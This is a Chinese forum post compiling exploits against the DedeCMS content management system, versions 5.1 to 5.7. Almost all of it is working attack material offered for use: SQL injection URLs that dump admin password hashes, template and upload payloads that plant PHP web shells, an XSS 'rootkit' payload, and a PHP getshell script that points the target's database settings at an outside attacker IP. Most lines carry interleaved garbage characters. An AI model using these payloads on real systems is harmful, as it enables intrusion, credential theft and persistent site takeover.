dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞% U; q! e( m2 }5 v: }% Y
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=10 j6 u% i8 a$ M$ @+ @/ P7 t

, n* G) d0 C) a! m+ w, _
4 m4 L8 V4 \9 i6 @4 a! c
) d* [& a' m( D7 o" j- f. h
  q9 F) @# U; W" a/ G, X
' a0 O: @6 \0 z3 i3 I3 U
8 ~2 U/ f; [/ @
, U' X+ n& o6 A' z( y2 s' C- S4 v5 b( B4 v3 c$ t
DedeCms v5.6 嵌入恶意代码执行漏洞
; Q1 D; Z% R; n* [注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
# x0 N, E2 t/ y; f发表后查看或修改即可执行8 _, C" e* F/ w7 K
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}6 U; h5 l1 F# n1 m+ c6 {6 V/ D
生成x.php 密码xiao，直接生成一句话。
- `* m$ ?9 o7 ~; v; A
5 c7 g& s  w/ P4 M; a" F) o0 b7 s+ B* B4 w* z, S  k3 y

. ]) {0 Z! ^$ t# k" ~/ \; I8 m9 G8 i! n7 k

; [0 \" M$ V( w# n, \" _6 [1 u# m2 r
9 F* O0 {7 D3 M* c0 @6 S

9 |" S+ q# `' Q2 uDede 5.6 GBK SQL注入漏洞* O4 |  H5 Y  \$ L
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
; e: F1 u8 z3 k4 Whttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞# l' S  u. T4 w6 c
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 z* m- X& M" {2 e3 U* F* d; E* Y- M

% Y$ q- h1 \' J: I+ r2 q5 E
+ s% k7 _( T( {+ c, n  k2 p
9 {" b& [  Z8 j2 {3 m! z
" W% H4 v& z8 t9 B: J' i! P  b$ f) V- ?' n
DEDECMS 全版本 gotopage变量XSS漏洞
5 p2 A9 K, l$ @2 T1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
' h/ C* J6 R: yhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="2 p( ^, g9 p( B, `, D, U

. {5 E# ?, z& D1 ?
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 8 {2 `) U0 i, n, P6 I: d
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell' j# n8 r% q7 R  L) a
#!usr/bin/php -w
9 k+ n* {2 O# F6 B9 _& {<?php7 u& W1 \- B) Z; V4 \3 i2 B8 G
error_reporting(E_ERROR);7 ?( O7 N" n9 h0 Y" o) H% _2 W: l
set_time_limit(0);
) a4 j  E6 p; a. _( }print_r('
. q/ Y" x; r  k9 N9 K- p6 `DEDEcms Variable Coverage/ L. Z9 g5 I8 U2 m; ^. O/ P( q
Exploit Author: www.heixiaozi.comwww.webvul.com
);) |) `/ G- ?. X4 B
echo "\r\n";
6 h' ?& m. T/ S2 I( Uif($argv[2]==null){
+ x& g. n/ G' Q/ i3 `- S# tprint_r('; B+ d3 s9 m) O7 K1 J; y3 v% s
+---------------------------------------------------------------------------+3 K6 P9 a$ c' c* Y% a- x: L6 d
Usage: php '.$argv[0].' url aid path
/ D5 V, D" {2 Z( |/ a9 c! taid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/8 L5 C: d4 A; [. |1 }) v- c* T
Example:
& m3 S! @7 O6 W" L- H8 a& N. B! cphp '.$argv[0].' www.site.com 1 old
7 }% D: g! i& F2 @1 \+---------------------------------------------------------------------------+; U7 Y0 N7 q; f1 E5 A
');
& G7 ?6 w4 h! qexit;
! h( G0 y" t  [}+ ]3 {6 _% ~/ h, L7 o# e" n
$url=$argv[1];1 s8 c) X, H* }
$aid=$argv[2];- E. n) }1 x- y/ B
$path=$argv[3];
" ?. N% y( r; {% t. q; o8 |: N5 D$exp=Getshell($url,$aid,$path);# ]) G  Q# y, D0 t/ `
if (strpos($exp,"OK")>12){
" b- ]& z8 }, T1 ~echo "4 y1 k! i8 h$ {
Exploit Success \n";
$ j9 v+ V% J9 J+ hif($aid==1)echo "
% p8 X4 p. O* {8 |$ HShell:".$url."/$path/data/cache/fuck.php\n" ;% I& `+ Z4 p8 v6 \3 ?
8 [( K, \# m$ N  }9 e/ `

1 @3 z: E3 r2 N% C2 `if($aid==2)echo ") A! i5 c* w- d/ n3 [- b
Shell:".$url."/$path/fuck.php\n" ;
( W) l; ^4 `+ |! m
3 v2 V( @% F: v8 E9 X* y4 \1 a7 b9 @2 a0 t% H
if($aid==3)echo "
' f  F- m$ i$ V  P1 E. JShell:".$url."/$path/plus/fuck.php\n";* E  n! z* d. |8 B6 K/ O) U

, m7 D; _2 U) w- b  V" E+ D6 p" E/ D' x/ r. [9 s
}else{. x$ j3 k0 K( D/ M
echo "* n5 M7 ?" y2 O* E1 \0 B
Exploit Failed \n";
% ?; L  q# Q$ O; a6 p) y5 ^}
+ }0 Y* @! q' j4 R) p+ ]6 Yfunction Getshell($url,$aid,$path){
. g) P% Q. V0 r7 t$id=$aid;
' N3 B+ O8 e0 G) B( F0 p. g$host=$url;
) n( y0 t: M* g" K0 t$port="80";
/ @! P1 ]# a& P0 |' ~0 ~6 }$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";" K% A% ^+ F3 Z) ?/ b/ G& ]
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";( d6 l' ]8 X- o2 m
$data .= "Host: ".$host."\r\n";
+ y" U( Z  _4 {- E$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";7 B- H9 g5 c1 v/ s. [
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";* V* F- T5 k$ `' Z3 _7 R9 L( U8 r
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
: F6 ]5 p' v) M2 h0 X//$data .= "Accept-Encoding: gzip,deflate\r\n";7 k+ x- S1 |# t- E, Q$ p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";- p7 T5 d4 \$ C; ?# b% a3 s
$data .= "Connection: keep-alive\r\n";* p; `0 V5 U6 w# {% v) m
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";# Z1 X3 @: [6 d
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";* Z, |8 W* ~6 t* A3 o
$data .= $content."\r\n";
5 V9 U# M+ [9 \6 Q" x' N+ _* ~$ock=fsockopen($host,$port);' `5 y. t% B5 J- T- B4 W" Q# m
if (!$ock) {
; E+ J5 s! _& |, Zecho "
8 `- ~- f7 `4 ^No response from ".$host."\n";
& Y$ Y9 t$ c9 H9 T& v}+ M. Z3 o2 O  e" i& C7 z& \
fwrite($ock,$data);
& ]* _& z) ~- n0 R  y9 f- f6 O7 R) }while (!feof($ock)) {
. }0 T! D) u* Y$ }$exp=fgets($ock, 1024);& v- S9 a6 O, F  z# ~- d. d
return $exp;
5 L5 J2 g+ a3 I* e- {* ]) w3 Y}
7 I; L3 V9 g6 M2 f7 @2 N}
7 {% L* H$ e, T9 }; p$ j% ^6 x5 v4 b/ G! |+ `  q0 X& o
7 [  Y5 z/ C& e0 R
?>- Y3 n% o; z4 `" ]; N

: j% Y9 T3 j1 y9 a
+ a; u# L2 y" f( n" L( k
6 _! w# s/ ?! ~. H$ m( s. K; r
- H9 P; e/ A4 G* K& `4 d5 {. `* \1 k0 A

: [5 ^( \4 h* C& e; s
1 w' v% J* M: t$ V( z: Y. }4 R, U# m  I' u; f9 X

3 E* X( X/ E: }1 ]5 C4 j: ~& R& v( z- I, z. |
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)& ~1 B  q" Y' J1 i1 S5 v1 I
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
- I/ ~3 F9 R5 g; @" S
2 L! n- f& V) U/ d
1 U7 T5 X+ N! [( n4 F8 V% h  \把上面validate=dcug改为当前的验证码，即可直接进入网站后台
6 e4 J4 A0 }# u0 A  {0 f4 y7 D" A3 N" z) n* v

7 D% W2 M' B9 ^' s1 o6 O此漏洞的前提是必须得到后台路径才能实现7 m3 r3 \8 m7 M
" B/ }. v5 J! P6 J
" i/ h) N9 p+ l
. l, b: i. r0 S+ W) K" v
1 Y) [: x4 M/ e) q4 C' h' c
9 H) \1 D( t: r3 J% |" V# O9 Q5 m
+ I: D- M5 b7 Q1 J

. C( E5 f9 D+ \5 ]. _3 V+ Y+ h
* d- V/ V; p6 a+ @0 P% H
2 X3 f% A7 }; \* ?
1 a5 H# ~$ N! S2 \& z) T  ADedecms织梦标签远程文件写入漏洞
' A7 B$ K2 x: Q前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');3 L9 F" x- a) O$ ]/ r9 a4 i4 [* b
) H0 W6 j3 }; x/ l/ ]) O7 @

1 k1 T; b8 n+ D, L/ e# o( B再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 3 @' C* R; a+ H; M) N
<form action="" method="post" name="QuickSearch" id="QuickSearch">4 m; \" k8 @* c( r- T- ^4 T
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
+ }0 W- `  F5 i( x3 L<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ D+ A, G) V  P# |) G7 e
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
: b0 E5 ?5 g9 G: p9 o<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />7 ]3 W: b& u5 h! l# M* x! \8 f
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />  J: E2 Y( Z( B
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />, q3 M9 K, o" J2 h1 j5 A4 f& z/ L
<input type="text" value="true" name="nocache" style="width:400">+ i  y8 w- ]: W9 E, r! d
<input type="submit" value="提交" name="QuickSearchBtn"><br />
6 r4 L$ k8 I- Y9 ^& u</form>
% {3 W; E9 M3 L<script>! H" m: H0 u; V4 H3 B6 r5 C
function addaction()
- \5 R$ v- j. Z2 U7 a{# W! ?& {* J8 @
document.QuickSearch.action=document.QuickSearch.doaction.value;
+ X$ V. i* W% y}
9 m# r8 G# B& t. h) M1 g( m& G* l</script>+ H4 n! x9 S% _# D8 L  ?5 c
7 f: |( X# }' @3 J- _* N5 S1 t% n: w5 o

5 z! s4 s9 }4 o7 Q5 C7 _; u, K$ _7 I5 c! G' U4 o3 a
' c: H$ F# p. C8 A# m0 J
& g9 \- y  H% t" u

7 c* @/ ?, }  ?1 a( K5 e9 Q+ ?5 R. q8 R3 ?! ?' r
) g! }, k& R* V. j3 j# @0 ^2 S
1 F, z* f. n2 x4 ?# u7 f$ H
DedeCms v5.6 嵌入恶意代码执行漏洞' i  D5 B- V% V( L  J0 U
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
* C, }7 F- F3 m4 H2 Y' Aa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
9 N# x- S: K5 D: T7 G  |2 ~% v生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得$ z0 R/ c6 J( o% K9 U3 x4 E& }
Dedecms <= V5.6 Final模板执行漏洞
4 V+ o* @7 {( m注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
% T" @! m: M9 J2 K' t8 euploads/userup/2/12OMX04-15A.jpg
3 n5 g. D8 C+ t6 k+ @5 R0 j) v" A0 a) f0 Q& P

" u( C1 z3 k# ^模板内容是（如果限制图片格式，加gif89a）：
: t8 |: D3 W3 N{dede:name runphp='yes'}. D" m: ?+ b. I6 ?2 [
$fp = @fopen("1.php", 'a');  M3 B/ D* r( n! j) M  U$ g' L
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
! C$ P2 w& X* ?8 S. _@fclose($fp);. f, _3 P% c0 w% S9 s. M
{/dede:name}5 R% }5 ~- \! L! _9 O6 s
2 修改刚刚发表的文章，查看源文件，构造一个表单：
# c5 R6 q! ^. }8 [<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, x: k2 Q. C2 x" F<input type="hidden" name="dopost" value="save" />
6 K+ G# J% B+ ~7 K( _<input type="hidden" name="aid" value="2" />
1 Z( z3 B2 y$ J% `, }1 P<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />$ w+ t  T/ o7 p
<input type="hidden" name="channelid" value="1" />
4 z: u( [; X" F9 ~<input type="hidden" name="oldlitpic" value="" />
3 `' L2 p* _1 M<input type="hidden" name="sortrank" value="1275972263" />
( H* W0 D( V. W) w* I* d
2 B+ O. p: C& s3 d
* o( b  T% n4 P- i" R+ C) v9 \: B<div id="mainCp">* [0 }2 m5 v: g( n, F; i
<h3 class="meTitle"><strong>修改文章</strong></h3>
3 r* G6 `# ^. {4 B5 O4 e
0 R$ I! U8 A/ Z- k  F% q; R. D9 f& Q  B8 @' t6 k
<div class="postForm">& ~) A+ U. C! u; ]7 s
<label>标题：</label># b/ \; d4 N2 ]3 Y. p) J3 q8 L
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
7 J1 N5 U  D8 ]6 E
3 e) ~6 d# }# Q# O4 ]- R( i! W0 T8 D& [6 O1 W" o. n' B8 `% e
<label>标签TAG：</label>" y$ ^  q, u* I+ m% J; h3 ~
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! T/ t3 a2 ~  f- a  y/ V- V) ?

- D$ }4 W8 I$ H. V7 z2 k& H0 P1 Y  ~" r8 n% @& l) ?/ c3 H" n
<label>作者：</label>
7 x9 S  I4 \. R, X0 X  \( Q<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, W$ E. Z. d7 R  q1 ]1 n
1 h+ W6 F/ C, i7 x9 J6 v2 W: K" N
; X6 m, {% V6 h+ Y2 u1 f
<label>隶属栏目：</label>! |# O9 b4 v0 s/ e- W9 g9 j* G
<select name='typeid' size='1'>
9 r% L- j0 L" P! y! ]<option value='1' class='option3' selected=''>测试栏目</option>7 L  q/ H$ L  R1 x+ n: M6 Z7 I9 l
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)1 j* E+ K/ y; n1 n2 J/ R

8 {& g7 Z! D8 b( V5 h- ~7 q8 }  P; M4 K8 |
<label>我的分类：</label>
$ s, m* t* t" E3 M8 z6 G<select name='mtypesid' size='1'>; h# x: g( f- A; S4 y, @
<option value='0' selected>请选择分类...</option>& V. C( [- a! r9 Y
<option value='1' class='option3' selected>hahahha</option>
' ^' d$ C$ O1 C1 O& v</select>
7 G9 x4 R" S9 r5 R0 A
; O3 c$ b6 l  y0 H) m
0 c2 n5 b; ?3 o5 b' }. o/ }<label>信息摘要：</label>
( @$ Z8 M* P. y0 h9 e; y<textarea name="description" id="description">1111111</textarea>5 R# b3 o6 L3 ~
(内容的简要说明)) z. x; _# R0 [1 \+ N
) e- D( y5 ~$ @: k- h& b
0 [" f. x7 h1 {1 Z+ p: m1 m1 L5 X
<label>缩略图：</label>* @5 P2 |# W6 o$ Y
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
1 \/ ]% p3 h: n
5 s+ ^; I8 N+ C6 C
3 f& v4 O$ C) \. U4 z<input type='text' name='templet'
5 L4 o9 T1 [% t2 b7 H1 u# ~- `value="../ uploads/userup/2/12OMX04-15A.jpg">
6 O+ p" N6 P) p1 v% ~/ ]<input type='text' name='dede_addonfields'
$ [7 y: B9 `% ?4 Lvalue="templet,htmltext;">（这里构造）
2 g" J, Z' F+ v! D7 Y: ]7 L0 _</div>
0 y+ d1 F/ B: H( _2 r+ I
! w) b4 I6 O. W! R$ A; U$ E+ t: C) L* P3 ]6 H' E8 K5 @

( \, j* i% |6 F<h3 class="meTitle">详细内容</h3>
" u* C1 d5 b5 _0 S# B- W
- f  w9 q6 h" l% v3 T( S/ U
0 ~: L  n' ]# \. e3 b* P<div class="contentShow postForm">
& s- \6 H  a3 e<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
4 f$ R. D. a1 I; e3 F! ~4 n1 W: Y& Y; [. O# ^3 ^

/ ~/ |4 p4 F2 t. `: W, I8 k<label>验证码：</label>& U5 }1 d- r- y3 Y9 H5 V" F
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
5 r; }/ q+ ]- g+ |7 i<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />4 x$ e! d1 \! k: q9 d

5 e/ G6 H- f/ T! k  `+ D! k) W4 X; _
<button class="button2" type="submit">提交</button>8 Q8 T$ |) z5 r% Z
<button class="button2 ml10" type="reset">重置</button>$ ~# x; J! P8 E3 ~- H7 y
</div>& f4 z1 u* j" |  P, D9 @

7 d; }' I6 D. S* ^$ h' W
8 |/ _" r! l1 z8 I3 y</div>+ D# E, j# ?5 a; C, I% v+ J5 s
5 E: X3 f* v, ~$ s3 U* |- I

. h' x- P8 ^) i- z</form>
5 J- \6 _$ ]8 F. I6 e% s( _& i8 J3 X' D/ G

6 n% m5 i1 L- @; w提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：  }7 \  p" f# R
假设刚刚修改的文章的aid为2，则我们只需要访问：
4 e; X5 o8 d+ Y2 Thttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
5 B( f5 b7 r4 n% T3 k
& o  s8 ?) }6 V5 C
6 {5 k$ R) t3 R0 K9 k
) C8 P1 I" e4 P. a4 J5 N! j; C+ l; ?8 M

1 g# p4 O7 C& t( E, ]+ J
  M8 c" {) \. k. @
% G7 B8 r* G0 X! ^+ P! n$ w  x6 C) Z  p/ n% b9 s

) i: U- v1 K, u$ Z7 D" n$ l
1 g/ ?0 e* q) F% ?0 i
! u% |. b/ L, s( D( b3 k: e! l. c& y7 r: Y) J$ L
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" D# @/ V0 A4 KGif89a{dede:field name='toby57' runphp='yes'}
/ q! ]9 A% v5 Z+ O. Aphpinfo();! {0 ?' T5 n$ ^5 W& d
{/dede:field}
1 k0 I- t3 h' R7 l3 N保存为1.gif  n8 u, Z$ \, J* v
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
( E5 e- u8 U$ Y' M) a8 G<input type="hidden" name="aid" value="7" />
  l: @* `4 y) S' t) u5 v<input type="hidden" name="mediatype" value="1" /> % t- W- V( A  r; U5 x1 Y, X$ \
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ) L! F- n* N1 z, m. V
<input type="hidden" name="dopost" value="save" />
6 P3 C# c$ F/ J: T- x- o<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> : {# D' }# Q% t! Z) B& z2 h
<input name="addonfile" type="file" id="addonfile"/>
# i( T7 F0 U$ J& h  a<button class="button2" type="submit" >更改</button> ; M0 U0 K9 @/ L/ {5 _
</form> + g" R9 S9 d7 F1 G

3 {6 v5 c% ]7 _3 {, s' U
; N1 y0 ^. P! H0 Q  v6 C! r构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
9 O5 p' J) u* R+ x# L9 O发表文章，然后构造修改表单如下：4 Z5 \. A, {( X5 D

9 j* h, K  n9 |% w& T# |9 C& L( f( s8 C" |7 w; o6 [, e
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
, e+ R3 j) a% F5 k2 [# n# k6 {<input type="hidden" name="dopost" value="save" />
0 V7 v* ^. d' t  c/ t) T<input type="hidden" name="aid" value="2" />
# ]" \$ a/ E0 v% F5 }<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
3 K; Q3 e, O3 F<input type="hidden" name="channelid" value="1" /> 0 E; L7 r: k$ L
<input type="hidden" name="oldlitpic" value="" /> * \/ o' U. ]8 A1 z- @& g8 |+ }
<input type="hidden" name="sortrank" value="1282049150" /> % f8 {% c9 X# `( s) _* I
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ) F7 u) c+ W$ c7 W5 O3 S
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
2 G8 q" m5 u3 @& e: T" B/ S% Z; y* q<select name='typeid' size='1'>
8 F' K, i+ |  E9 ^5 R<option value='1' class='option3' selected=''>Test</option> & v; d- J, p8 O' W0 w6 D( e% K
<select name='mtypesid' size='1'> & k, l& Z  g/ \9 N. `3 {
<option value='0' selected>请选择分类...</option>
, Y; a/ U* A$ `4 a<option value='1' class='option3' selected>aa</option></select>
; Y" S- _0 o) l, {<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
" C5 b, D0 _$ v- P& W<input type='hidden' name='dede_addonfields' value="templet"> ' G9 K. d; x$ {4 l% x* B4 @- B
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 x- n9 W# B, o
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 0 ]- F5 C$ i8 A$ ]. T, R
<button class="button2" type="submit">提交</button>
- I* [, @4 i8 A: w* f</form>
; k( l6 F* a! _; \0 H. r5 e7 a3 }: o
- m* v& Y# c2 A$ `# ^8 n7 m+ k1 p) j* V$ r: J6 _

0 y! Y  ^* q$ k$ }" `2 k/ U+ D; y) [6 `0 e! |
; Q$ z0 K9 A8 }& O0 F8 j: a9 b- L4 g
4 h- Y, `  n2 `6 V! x! b
. t! A$ ~' L( l) Y6 J3 q( R6 ]
1 \# c; ?0 @1 F. Z

. U) w& c) S' c/ g3 g/ @$ `' V
0 H+ a3 L8 h( n1 V. a/ P: |2 ?- q, w& q% B1 }
7 |6 q6 r; s- h( B2 D# a. W, u
织梦(Dedecms)V5.6 远程文件删除漏洞' Q9 z$ E4 @/ p$ R
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
% g/ |; p# E: S. }( Vhttp://www.test.com/plus/carbuya ... urn&code=../../
2 M1 M- H4 }1 Z1 Q' @  F8 Y% C0 ?" ?& i1 {2 V: ]
( P9 c$ ]& [# m* ]
2 k8 ?+ Z; g  U4 C3 s' D3 V/ F, S+ }/ f
9 A# W7 H, B0 ~2 n

7 y; n/ \) ?% l. `( u! o/ Z5 C9 C2 |5 O4 q

  ]' v  f$ q5 y# k
0 L: G* _% r1 t' W/ O2 v
, U2 v/ O9 p* h& u% H) o6 y
. N, O) S1 l  RDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
+ U; F3 V& k( ]* T$ V6 {plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
. t8 |6 r; b; [: q密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5/ ~7 e! I. I7 R4 z9 S. Z0 L/ T
1 Y4 ?) G4 N: K5 G
2 d( o  `' n! P

; @2 {- I+ E& |! g! ]* n$ K8 f  E# R9 c; @$ [1 r
% t( ]( S! |# {3 V$ h2 R

- @+ J) y( `5 w- _8 E5 i$ ^1 \+ l5 z

' h. s1 ^* D: u5 l5 B5 \! }0 \. I+ J4 t$ |- Y+ ^8 d; E2 N
2 w+ T9 d. T, v8 j, T
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞8 J, T  x3 U7 B$ H, ^' M
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" }! w9 Q! e; Y& l  W0 U  z2 R. y; Y/ V% I. K

) o1 ?0 S9 J- |5 |5 O+ [
) V' e0 O+ a5 N9 R& ]1 w! r' E+ |
; b# G+ y) H; c
+ y' c/ M8 M! W# y. N; W* J

* E7 J9 ~& O* O* i+ K. Y( M- y
/ }# d- m- M* ?, f9 o, W0 l& F6 \# a& ~8 ~  Q8 k
, k! @  s3 T8 |& \
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
5 p0 Q  j0 t, X; O3 |2 M<html>: u7 p8 v" q. P% _" u$ Z* B  L& D
<head>. I. G% r( h: g# w, R
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>- S  M& N( G/ K0 a6 R! g) Z. N  |
</head>6 M$ W8 Z7 z+ \  K
<body style="FONT-SIZE: 9pt">/ [$ S. u3 _# U: c
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />8 r! b" ]7 |* E. t" N5 \% w
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
6 g* w2 U; V6 x+ B! Y9 a<input type='hidden' name='activepath' value='/data/cache/' />
1 w& n5 Q& o+ i% ^- H<input type='hidden' name='cfg_basedir' value='../../' />' f: z' L* B# e3 O/ V
<input type='hidden' name='cfg_imgtype' value='php' />" R- f* D# w! z
<input type='hidden' name='cfg_not_allowall' value='txt' />  @1 v# C2 W! v1 t3 K( P
<input type='hidden' name='cfg_softtype' value='php' />
1 e0 ^+ s8 ?' X) l( m7 J7 E" C" C<input type='hidden' name='cfg_mediatype' value='php' />/ c* ^& u/ V( U) r! r' A+ ^
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
! L3 v2 o0 R, X1 M+ P$ [<input type='hidden' name='newname' value='fly.php' />
